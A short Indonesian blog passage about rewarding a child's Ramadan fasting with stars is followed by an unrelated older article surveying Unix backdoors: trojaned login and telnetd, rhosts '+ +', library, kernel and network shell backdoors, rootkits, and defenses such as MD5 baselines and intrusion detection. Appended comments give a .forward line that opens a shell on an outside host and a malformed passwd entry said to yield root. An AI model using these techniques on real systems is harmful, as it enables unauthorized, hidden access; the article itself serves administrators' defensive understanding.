well.. itu menandakan hari-hari dimana mujib puasa sejak awal ramadhan. gambar bintang menunjukkan bahwa hari itu mujib "puasa" penuh. ya paling tidak mujib ikut sahur dan buka bersama... saya sendiri gak tahu apa ia benar-benar menahan makan & minum seharian.
well... gambar bintang itu merupakan reward atas ide-nya mbak iis. kalo mujib berpuasa satu hari penuh maka ia akan mendapat bintang pada hari itu, kalo gak puasa penuh alias ketahuan makan/minum ya.. nggak dapat bintang-lah tentunya.
dari semenjak kecil memang baiknya anak-anak diajari hal-hal yang baik, dan tentunya dengan metode yang menarik minat anak-anak.. dan tidak semua anak dapat dibujuk dengan metode yang sama, karena tiap anak adalah spesial dan memiliki karakter yang berbeda-beda.
well.. sekian report saya... semoga bisa menjadi ide bagi para ibu yang ingin mendidik anaknya sejak kecil.

Backdoors

Backdoors

By Puerto


Since the early days of intruders breaking into computers, they have tried
to develop techniques or backdoors that allow them to get back into the
system. In this paper, it will be focused on many of the common backdoors
and possible ways to check for them. Most of focus will be on Unix
backdoors with some discussion on future Windows NT backdoors. This will
describe the complexity of the issues in trying to determine the methods
that intruders use and the basis for administrators understanding on how
they might be able to stop the intruders from getting back in. When an
administrator understands how difficult it would be to stop intruder once
they are in, the appreciation of being proactive to block the intruder from
ever getting in becomes better understood. This is intended to cover many
of the popular commonly used backdoors by beginner and advanced intruders.
This is not intended to cover every possible way to create a backdoor as
the possibilities are limitless.

The backdoor for most intruders provide two or three main functions:

Be able to get back into a machine even if the administrator tries to
secure it, e.g., changing all the passwords.

Be able to get back into the machine with the least amount of visibility.
Most backdoors provide a way to avoid being logged and many times the
machine can appear to have no one online even while an intruder is using
it.

Be able to get back into the machine with the least amount of time. Most
intruders want to easily get back into the machine without having to do all
the work of exploiting a hole to gain access.

In some cases, if the intruder may think the administrator may detect any
installed backdoor, they will resort to using the vulnerability repeatedly
to get on a machine as the only backdoor. Thus not touching anything that
may tip off the administrator. Therefore in some cases, the
vulnerabilities on a machine remain the only unnoticed backdoor.


Password Cracking Backdoor

One of the first and oldest methods of intruders used to gain not only
access to a Unix machine but backdoors was to run a password cracker. This
uncovers weak passworded accounts. All these new accounts are now possible
backdoors into a machine even if the system administrator locks out the
intruder's current account. Many times, the intruder will look for unused
accounts with easy passwords and change the password to something
difficult. When the administrator looked for all the weak passworded
accounts, the accounts with modified passwords will not appear. Thus the
administrator will not be able to easily determine which accounts to lock
out.

Rhosts + + Backdoor

On networked Unix machines, services like Rsh and Rlogin used a simple
authentication method based on hostnames that appear in rhosts. A user
could easily configure which machines not to require a password to log
into. An intruder that gained access to someone's rhosts file could put a
"+ +" in the file and that would allow anyone from anywhere to log into
that account without a password. Many intruders use this method especially
when NFS is exporting home directories to the world. These accounts
become backdoors for intruders to get back into the system. Many intruders
prefer using Rsh over Rlogin because it is many times lacking any logging
capability. Many administrators check for "+ +" therefore an intruder may
actually put in a hostname and username from another compromised account on
the network, making it less obvious to spot.

Checksum and Timestamp Backdoors

Early on, many intruders replaced binaries with their own trojan versions.
Many system administrators relied on time-stamping and the system checksum
programs, e.g., Unix's sum program, to try to determine when a binary file
has been modified. Intruders have developed technology that will recreate
the same time-stamp for the trojan file as the original file. This is
accomplished by setting the system clock time back to the original file's
time and then adjusting the trojan file's time to the system clock. Once
the binary trojan file has the exact same time as the original, the system
clock is reset to the current time. The sum program relies on a CRC
checksum and is easily spoofed. Intruders have developed programs that
would modify the trojan binary to have the necessary original checksum,
thus fooling the administrators. MD5 checksums is the recommended choice
to use today by most vendors. MD5 is based on an algorithm that no one has
yet to date proven can be spoofed.

Login Backdoor

On Unix, the login program is the software that usually does the password
authentication when someone telnets to the machine. Intruders grabbed the
source code to login.c and modified it that when login compared the user's
password with the stored password, it would first check for a backdoor
password. If the user typed in the backdoor password, it would allow you to
log in regardless of what the administrator sets the passwords to. Thus
this allowed the intruder to log into any account, even root. The
password backdoor would spawn access before the user actually logged in and
appeared in utmp and wtmp. Therefore an intruder could be logged in and
have shell access without it appearing anyone is on that machine as that
account. Administrators started noticing these backdoors especially if
they did a "strings" command to find what text was in the login program.
Many times the backdoor password would show up. The intruders then
encrypted or hid the backdoor password better so it would not appear by
just doing strings. Many of the administrators can detect these backdoors
with MD5 checksums.

Telnetd Backdoor

When a user telnets to the machine, inetd service listens on the port and
receive the connection and then passes it to in.telnetd, that then runs
login. Some intruders knew the administrator was checking the login
program for tampering, so they modified in.telnetd. Within in.telnetd, it
does several checks from the user for things like what kind of terminal the
user was using. Typically, the terminal setting might be Xterm or VT100.
An intruder could backdoor it so that when the terminal was set to
"letmein", it would spawn a shell without requiring any authentication.
Intruders have backdoored some services so that any connection from a
specific source port can spawn a shell.

Services Backdoor

Almost every network service has at one time been backdoored by an
intruder. Backdoored versions of finger, rsh, rexec, rlogin, ftp, even
inetd, etc., have been floating around forever. There are programs that
are nothing more than a shell connected to a TCP port with maybe a backdoor
password to gain access. These programs sometimes replace a service like
uucp that never gets used or they get added to the inetd.conf file as a new
service. Administrators should be very wary of what services are running
and analyze the original services by MD5 checksums.

Cronjob backdoor

Cronjob on Unix schedules when certain programs should be run. An intruder
could add a backdoor shell program to run between 1 AM and 2 AM. So for 1
hour every night, the intruder could gain access. Intruders have also
looked at legitimate programs that typically run in cronjob and built
backdoors into those programs as well.

Library backdoors

Almost every UNIX system uses shared libraries. The shared libraries are
intended to reuse many of the same routines thus cutting down on the size
of programs. Some intruders have backdoored some of the routines like
crypt.c and _crypt.c. Programs like login.c would use the crypt() routine
and if a backdoor password was used it would spawn a shell. Therefore,
even if the administrator was checking the MD5 of the login program, it was
still spawning a backdoor routine and many administrators were not checking
the libraries as a possible source of backdoors.

One problem for many intruders was that some administrators started MD5
checksums of almost everything. One method intruders used to get around
that is to backdoor the open() and file access routines. The backdoor
routines were configured to read the original files, but execute the trojan
backdoors. Therefore, when the MD5 checksum program was reading these
files, the checksums always looked good. But when the system ran the
program, it executed the trojan version. Even the trojan library itself,
could be hidden from the MD5 checksums. One way to an administrator could
get around this backdoor was to statically link the MD5 checksum checker
and run on the system. The statically linked program does not use the
trojan shared libraries.

Kernel backdoors

The kernel on Unix is the core of how Unix works. The same method used for
libraries for bypassing MD5 checksum could be used at the kernel level,
except even a statically linked program could not tell the difference. A
good backdoored kernel is probably one of the hardest to find by
administrators, fortunately kernel backdoor scripts have not yet been
widely made available and no one knows how wide spread they really are.

File system backdoors

An intruder may want to store their loot or data on a server somewhere
without the administrator finding the files. The intruder's files can
typically contain their toolbox of exploit scripts, backdoors, sniffer
logs, copied data like email messages, source code, etc. To hide these
sometimes large files from an administrator, an intruder may patch the
files system commands like "ls", "du", and "fsck" to hide the existence of
certain directories or files. At a very low level, one intruder's backdoor
created a section on the hard drive to have a proprietary format that was
designated as "bad" sectors on the hard drive. Thus an intruder could
access those hidden files with only special tools, but to the regular
administrator, it is very difficult to determine that the marked "bad"
sectors were indeed storage area for the hidden file system.

Bootblock backdoors

In the PC world, many viruses have hid themselves within the bootblock
section and most antivirus software will check to see if the bootblock has
been altered. On Unix, most administrators do not have any software that
checks the bootblock, therefore some intruders have hidden some backdoors
in the bootblock area.

Process hiding backdoors

An intruder many times wants to hide the programs they are running. The
programs they want to hide are commonly a password cracker or a sniffer.
There are quite a few methods and here are some of the more common:

An intruder may write the program to modify its own argv[] to make it look
like another process name.

An intruder could rename the sniffer program to a legitimate service like
in.syslog and run it. Thus when an administrator does a "ps" or looks at
what is running, the standard service names appear.

An intruder could modify the library routines so that "ps" does not show
all the processes.

An intruder could patch a backdoor or program into an interrupt driven
routine so it does not appear in the process table. An example backdoor
using this technique is amod.tar.gz available on
http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html

An intruder could modify the kernel to hide certain processes as well.

Rootkit

One of the most popular packages to install backdoors is rootkit. It can
easily be located using Web search engines. From the Rootkit README, here
are the typical files that get installed:

z2 - removes entries from utmp, wtmp, and lastlog.
Es - rokstar's ethernet sniffer for sun4 based kernels.
Fix - try to fake checksums, install with same dates/perms/u/g.
Sl - become root via a magic password sent to login.
Ic - modified ifconfig to remove PROMISC flag from output.
ps: - hides the processes.
Ns - modified netstat to hide connections to certain machines.
Ls - hides certain directories and files from being listed.
du5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.


Network traffic backdoors

Not only do intruders want to hide their tracks on the machine, but also
they want to hide their network traffic as much as possible. These network
traffic backdoors sometimes allow an intruder to gain access through a
firewall. There are many network backdoor programs that allow an intruder
to set up on a certain port number on a machine that will allow access
without ever going through the normal services. Because the traffic is
going to a non-standard network port, the administrator can overlook the
intruder's traffic. These network traffic backdoors are typically using
TCP, UDP, and ICMP, but it could be many other kinds of packets.

TCP Shell Backdoors

The intruder can set up these TCP Shell backdoors on some high port number
possibly where the firewall is not blocking that TCP port. Many times,
they will be protected with a password just so that an administrator that
connects to it, will not immediately see shell access. An administrator
can look for these connections with netstat to see what ports are listening
and where current connections are going to and from. Many times, these
backdoors allow an intruder to get past TCP Wrapper technology. These
backdoors could be run on the SMTP port, which many firewalls allow traffic
to pass for e-mail.

UDP Shell Backdoors

Administrator many times can spot a TCP connection and notice the odd
behavior, while UDP shell backdoors lack any connection so netstat would
not show an intruder accessing the Unix machine. Many firewalls have been
configured to allow UDP packets for services like DNS through. Many times,
intruders will place the UDP Shell backdoor on that port and it will be
allowed to by-pass the firewall.

ICMP Shell Backdoors

Ping is one of the most common ways to find out if a machine is alive by
sending and receiving ICMP packets. Many firewalls allow outsiders to ping
internal machines. An intruder can put data in the Ping ICMP packets and
tunnel a shell between the pinging machines. An administrator may notice a
flurry of Ping packets, but unless the administrator looks at the data in
the packets, an intruder can be unnoticed.

Encrypted Link

An administrator can set up a sniffer trying to see data appears as someone
accessing a shell, but an intruder can add encryption to the Network
traffic backdoors and it becomes almost impossible to determine what is
actually being transmitted between two machines.

Windows NT

Because Windows NT does not easily allow multiple users on a single machine
and remote access similar as Unix, it becomes harder for the intruder to
break into Windows NT, install a backdoor, and launch an attack from it.
Thus you will find more frequently network attacks that are spring boarded
from a Unix box than Windows NT. As Windows NT advances in multi-user
technologies, this may give a higher frequency of intruders who use Windows
NT to their advantage. And if this does happen, many of the concepts from
Unix backdoors can be ported to Windows NT and administrators can be ready
for the intruder. Today, there are already telnet daemons available for
Windows NT. With Network Traffic backdoors, they are very feasible for
intruders to install on Windows NT.

Solutions

As backdoor technology advances, it becomes even harder for administrators
to determine if an intruder has gotten in or if they have been successfully
locked out.

Assessment

One of the first steps in being proactive is to assess how vulnerable your
network is, thus being able to figure out what holes exist that should be
fixed. Many commercial tools exist to help scan and audit the network and
systems for vulnerabilities. Many companies could dramatically improve
their security if they only installed the security patches made freely
available by their vendors.

MD5 Baselines

One necessary component of a system scanner is MD5 checksum baselines.
This MD5 baseline should be built up before a hacker attack with clean
systems. Once a hacker is in and has installed backdoors, trying to create
a baseline after the fact could incorporate the backdoors into the
baseline. Several companies had been hacked and had backdoors installed on
their systems for many months. Overtime, all the backups of the systems
contained the backdoors. When some of these companies found out they had
a hacker, they restored a backup in hopes of removing any backdoors. The
effort was futile since they were restoring all the files, even the
backdoored ones. The binary baseline comparison needs to be done before an
attack happens.

Intrusion detection

Intrusion detection is becoming more important as organizations are hooking
up and allowing connections to some of their machines. Most of the older
intrusion detection technology was log-based events. The latest intrusion
detection system (IDS) technology is based on real-time sniffing and
network traffic security analysis. Many of the network traffic backdoors
can now easily be detected. The latest IDS technology can take a look at
the DNS UDP packets and determine if it matches the DNS protocol requests.
If the data on the DNS port does not match the DNS protocol, an alert flag
can be signaled and the data captured for further analysis. The same
principle can be applied to the data in an ICMP packet to see if it is the
normal ping data or if it is carrying encrypted shell session.

Boot from CD-ROM.

Some administrators may want to consider booting from CD-ROM thus
eliminating the possibility of an intruder installing a backdoor on the
CD-ROM. The problem with this method is the cost and time of implementing
this solution enterprise wide.

Vigilant

Because the security field is changing so fast, with new vulnerabilities
being announced daily and intruders are constantly designing new attack and
backdoor techniques, no security technology is effective without vigilance.

Be aware that no defense is foolproof, and that there is no substitute for
diligent attention.

-------------------------------------------------------------------------


you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:

\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

permutations of this method include alteration of the systems mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).

PS: The above method is also useful gaining access a companies
mailhub (assuming there is a shared a home directory FS on
the client and server).

> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).


---------------------------------------------------------------------------


you may want to add this "feature" that can act as a backdoor:

when specifying a wrong uid/gid in the /etc/password file,
most login(1) implementations will fail to detect the wrong
uid/gid and atoi(3) will set uid/gid to 0, giving superuser
privileges.

example:
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
on Linux boxes, this will give uid 0 to user rmartin.